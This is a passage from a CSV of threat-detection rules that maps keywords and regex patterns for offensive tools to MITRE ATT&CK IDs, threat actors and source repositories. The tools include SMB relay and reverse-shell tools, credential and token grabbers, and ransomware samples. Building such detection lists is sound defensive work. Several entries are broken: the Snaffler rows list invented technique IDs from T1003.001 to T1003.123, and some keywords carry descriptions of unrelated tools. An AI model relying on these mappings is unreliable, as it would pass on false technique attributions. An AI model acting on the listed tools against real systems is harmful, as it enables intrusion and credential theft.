- T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59719"
"*smbrelayserver.*",".{0,1000}smbrelayserver\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","59720"
"*smbrelayserver.py*",".{0,1000}smbrelayserver\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","59721"
"*smbrelayx.py*",".{0,1000}smbrelayx\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","59722"
"*smb-reverse-shell.git*",".{0,1000}smb\-reverse\-shell\.git.{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","N/A","10","10","17","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z","59723"
"*smb-reverse-shell-main*",".{0,1000}smb\-reverse\-shell\-main.{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","N/A","10","10","17","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z","59724"
"*smbscan*",".{0,1000}smbscan.{0,1000}","offensive_tool_keyword","smb-scanner","SMB Scanner tool","T1210.001 - T1190 - T1020 - T1213","TA0007 - TA0002 - TA0001","N/A","APT22","Reconnaissance","https://github.com/TechnicalMujeeb/smb-scanner","1","1","N/A","N/A","N/A","1","61","18","2018-03-30T10:25:18Z","2018-03-29T14:13:20Z","59725"
"*smb-scanner*",".{0,1000}smb\-scanner.{0,1000}","offensive_tool_keyword","smb-scanner","SMB Scanner tool","T1210.001 - T1190 - T1020 - T1213","TA0007 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/TechnicalMujeeb/smb-scanner","1","1","N/A","N/A","N/A","1","61","18","2018-03-30T10:25:18Z","2018-03-29T14:13:20Z","59726"
"*smb-secrets-revealer.py*",".{0,1000}smb\-secrets\-revealer\.py.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","59728"
"*smbserver.py -payload*",".{0,1000}smbserver\.py\s\-payload.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","59729"
"*smbserver.py -smb2support EXEGOL*",".{0,1000}smbserver\.py\s\-smb2support\sEXEGOL.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59730"
"*smbserver.py*",".{0,1000}smbserver\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","59731"
"*smbsigning_check*",".{0,1000}smbsigning_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","59732"
"*smbspider *",".{0,1000}smbspider\s.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","59733"
"*smbspider.py*",".{0,1000}smbspider\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","59734"
"*smbsr.py*",".{0,1000}smbsr\.py.{0,1000}","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","N/A","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","59735"
"*smbsrfile_results.csv*",".{0,1000}smbsrfile_results\.csv.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","59736"
"*Smbtouch.exe*",".{0,1000}Smbtouch\.exe.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","1","N/A","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","59737"
"*Smbtouch-1.1.1.exe*",".{0,1000}Smbtouch\-1\.1\.1\.exe.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","1","N/A","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","59738"
"*Smbtouch-1.1.1.xml*",".{0,1000}Smbtouch\-1\.1\.1\.xml.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","1","N/A","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","59739"
"*SmbtouchScanner.py*",".{0,1000}SmbtouchScanner\.py.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","1","N/A","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","59740"
"*smbtrap-mitmproxy-inline*",".{0,1000}smbtrap\-mitmproxy\-inline.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","#content","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","59741"
"*smicallef/spiderfoot*",".{0,1000}smicallef\/spiderfoot.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Reconnaissance","https://www.spiderfoot.net/","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A","59750"
"*SMShell.sln*",".{0,1000}SMShell\.sln.{0,1000}","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","1","N/A","N/A","10","10","360","35","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z","59751"
"*smtprelayclient.py*",".{0,1000}smtprelayclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","59752"
"*smtprelayclient.py*",".{0,1000}smtprelayclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","59753"
"*smtp-user-enum * -M EXPN *",".{0,1000}smtp\-user\-enum\s.{0,1000}\s\-M\sEXPN\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59754"
"*smtp-user-enum * -M RCPT *",".{0,1000}smtp\-user\-enum\s.{0,1000}\s\-M\sRCPT\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59755"
"*smtp-user-enum * -M VRFY *",".{0,1000}smtp\-user\-enum\s.{0,1000}\s\-M\sVRFY\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59756"
"*smtp-user-enum*",".{0,1000}smtp\-user\-enum.{0,1000}","offensive_tool_keyword","smtp-user-enum","Username guessing tool primarily for use against the default Solaris SMTP service. Can use either EXPN - VRFY or RCPT TO.","T1133 - T1110.001","TA0007 - TA0006","N/A","N/A","Credential Access","https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","59757"
"*smtp-user-enum.py*",".{0,1000}smtp\-user\-enum\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","59758"
"*Smug246/Luna-Grabber*",".{0,1000}Smug246\/Luna\-Grabber.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","1","N/A","N/A","10","","N/A","","","","59759"
"*smukx@proton.me*",".{0,1000}smukx\@proton\.me.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#email","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","59760"
"*smukx@protonmail.com*",".{0,1000}smukx\@protonmail\.com.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","#email","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","59761"
"*SmutnyKobimtochukwu@protonmail.com*",".{0,1000}SmutnyKobimtochukwu\@protonmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","59762"
"*sn.exe -k key.snk*",".{0,1000}sn\.exe\s\-k\skey\.snk.{0,1000}","offensive_tool_keyword","DirtyCLR","An App Domain Manager Injection DLL PoC","T1055.001 - T1546.016 - T1055.013","TA0005 - TA0004","N/A","Black Basta","Privilege Escalation","https://github.com/ipSlav/DirtyCLR","1","0","N/A","N/A","7","2","170","19","2023-12-14T21:22:12Z","2023-12-11T11:29:36Z","59763"
"*SnaffCon/Snaffler*",".{0,1000}SnaffCon\/Snaffler.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59764"
"*SnaffCore.csproj*",".{0,1000}SnaffCore\.csproj.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59765"
"*SnaffCore/ActiveDirectory*",".{0,1000}SnaffCore\/ActiveDirectory.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59766"
"*SnaffCore/Classifiers*",".{0,1000}SnaffCore\/Classifiers.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation 